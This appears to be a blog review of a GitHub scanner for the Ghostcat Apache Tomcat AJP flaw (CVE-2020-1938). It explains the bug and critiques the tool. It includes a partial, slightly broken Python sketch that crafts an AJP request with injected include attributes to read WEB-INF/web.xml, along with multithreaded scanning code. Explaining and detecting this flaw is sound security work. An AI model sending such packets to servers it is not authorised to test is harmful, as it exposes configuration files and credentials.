Building a Ghostcat Vulnerability Scanner: Inside CNVD-2020-10487 Detection

Hook

In February 2020, a 13-year-old bug in Apache Tomcat allowed attackers to read any file from your server—including configuration files with database credentials—through a protocol connector that most administrators didn't even know was exposed.

Context

CNVD-2020-10487, better known as Ghostcat or CVE-2020-1938, represents one of those security vulnerabilities that makes you question everything you thought you knew about your infrastructure. The vulnerability affects the Apache JServ Protocol (AJP) connector in Apache Tomcat, a component that's been shipped enabled by default since version 6.x. The AJP protocol was designed to allow web servers like Apache httpd to communicate with Tomcat application servers, improving performance through persistent connections and binary protocol efficiency.

The problem? AJP connectors listened on port 8009 by default, often without authentication, and a flaw in the request attribute handling allowed attackers to include arbitrary attributes in AJP requests. By manipulating these attributes—specifically javax.servlet.include.request_uri and javax.servlet.include.path_info—an attacker could trick Tomcat into serving arbitrary files from the web application root. Even worse, in certain configurations with file upload capabilities, this could escalate to remote code execution. The vulnerability affected Tomcat versions 6.x through 9.x before patches were released, meaning millions of servers were potentially exposed. This created an immediate need for simple, effective scanning tools to identify vulnerable instances across infrastructure, which is exactly the gap that CNVD-2020-10487_scanner attempts to fill.

Technical Insight

System architecture — auto-generated

The scanner implements a straightforward but effective approach to Ghostcat detection: multithreaded scanning with file-based I/O for targets and results. At its core, the tool reads target hosts from url.txt, spawns multiple threads to test each target concurrently, and writes vulnerable hosts to vul.txt. This architecture prioritizes speed and simplicity over configurability.

The vulnerability detection itself relies on crafting malicious AJP protocol packets. The AJP13 protocol uses a binary format where requests begin with a magic number (0x1234) followed by packet length and type codes. A typical Ghostcat exploit constructs an AJP ForwardRequest packet with manipulated attributes. Here's what a simplified detection payload structure looks like:

def build_ajp_forward_request():
    # AJP13 Forward Request structure
    ajp_header = b'\x12\x34'  # Magic number
    
    # Exploit attributes to read WEB-INF/web.xml
    attributes = {
        'javax.servlet.include.request_uri': '/',
        'javax.servlet.include.path_info': '/WEB-INF/web.xml',
        'javax.servlet.include.servlet_path': '/'
    }
    
    # Build AJP request packet
    packet = ajp_header
    packet += struct.pack('>H', len(payload))  # Packet length
    packet += b'\x02'  # Forward Request code
    packet += build_ajp_string('GET')  # HTTP method
    packet += build_ajp_string('/WEB-INF/web.xml')  # URI
    # ... additional headers and attributes
    
    return packet

def build_ajp_string(s):
    encoded = s.encode('utf-8')
    return struct.pack('>H', len(encoded)) + encoded + b'\x00'

The scanner establishes a TCP socket connection to the target on port 8009, sends the crafted AJP packet, and analyzes the response. A vulnerable server will return the contents of WEB-INF/web.xml or another sensitive file, while a patched server will reject the malformed request attributes. The key is looking for HTTP 200 responses with actual file content rather than error pages.

Multithreading implementation uses Python's threading module to parallelize scans across multiple targets. The typical pattern involves a queue of targets with worker threads consuming from the queue:

import threading
import queue

def worker(target_queue, results):
    while not target_queue.empty():
        try:
            target = target_queue.get(timeout=1)
            if check_vulnerability(target):
                results.append(target)
            target_queue.task_done()
        except queue.Empty:
            break

def scan_targets(targets, thread_count=10):
    target_queue = queue.Queue()
    results = []
    
    for target in targets:
        target_queue.put(target)
    
    threads = []
    for _ in range(thread_count):
        t = threading.Thread(target=worker, args=(target_queue, results))
        t.start()
        threads.append(t)
    
    for t in threads:
        t.join()
    
    return results

This approach provides reasonable performance for scanning hundreds or thousands of targets without the complexity of async I/O frameworks. The thread count acts as a throttle—too few threads and you're not utilizing available network bandwidth, too many and you risk overwhelming your network stack or triggering rate limits on target networks.

One interesting aspect of AJP vulnerability scanning is protocol fallback handling. Some servers run AJP connectors behind firewalls or on non-standard ports, while others might have partial mitigations in place. A robust scanner should implement timeout handling, connection retry logic, and graceful degradation when targets don't respond as expected. The basic architecture of this scanner provides the foundation but would benefit from error handling enhancements for production use.

Gotcha

The most significant limitation is the lack of configuration options and error handling. The scanner appears to hardcode critical parameters like thread count, timeout values, and target port (8009). In real-world penetration testing, you need flexibility—scanning targets on custom ports, adjusting timeouts for slow networks, or rate-limiting to avoid detection. The absence of command-line arguments or a configuration file means modifying the source code for basic adjustments.

There's also a notable filename discrepancy in the repository: the main script is named CNVD-2020-1048_scanner.py (missing the '7' in 10487). This kind of typo, while minor, suggests the tool was created quickly without thorough review or testing. More concerning is the lack of validation in the scanning logic. What happens when url.txt contains malformed entries? How does the scanner handle network errors, timeouts, or unexpected responses? Production-grade scanning tools include extensive logging, graceful error recovery, and detailed reporting—features conspicuously absent here. The three-star GitHub rating and minimal documentation reinforce that this is a proof-of-concept rather than a maintained security tool. For educational purposes or quick internal assessments, these limitations are manageable. For professional security work, they're dealbreakers.

Verdict

Use if: You're learning about the Ghostcat vulnerability and want a simple Python reference implementation to understand AJP protocol exploitation, you need a quick throwaway scanner for an internal CTF or lab environment where reliability isn't critical, or you're building a custom scanning toolkit and want a basic template to extend with proper error handling and features. Skip if: You're conducting professional penetration tests or security assessments where accuracy and reliability matter, you need comprehensive reporting and logging for compliance or documentation purposes, you're scanning production environments where false negatives could leave critical vulnerabilities undetected, or you simply want a maintained tool with community support—in these cases, use Nuclei with CVE-2020-1938 templates or Metasploit's auxiliary scanners instead. This tool serves as an educational artifact demonstrating vulnerability scanner architecture, but it lacks the polish for serious security work.

Building a Ghostcat Vulnerability Scanner: Inside CNVD-2020-10487 Detection

Building a Ghostcat Vulnerability Scanner: Inside CNVD-2020-10487 Detection

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// CODEBASE INTELLIGENCE

Best for

Skip when

[ SIMILAR REPOS ]

Building a Ghostcat Vulnerability Scanner: Inside CNVD-2020-10487 Detection

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// RELATED

Open Interpreter: Running GPT-4 with Root Access to Your Machine

Accomplish: Why Wrapping OpenCode Instead of Building an Agent Runtime Was the Right Bet

NVIDIA Cosmos: A Case Study in Strategic Repository Deprecation

How Ripgrep Makes Searching 10x Faster Than Grep: A Deep Dive Into Rust-Powered Text Search

Open Interpreter: Running GPT-4 with Root Access to Your Machine

Accomplish: Why Wrapping OpenCode Instead of Building an Agent Runtime Was the Right Bet

NVIDIA Cosmos: A Case Study in Strategic Repository Deprecation

// CODEBASE INTELLIGENCE

Best for

Skip when

[ SIMILAR REPOS ]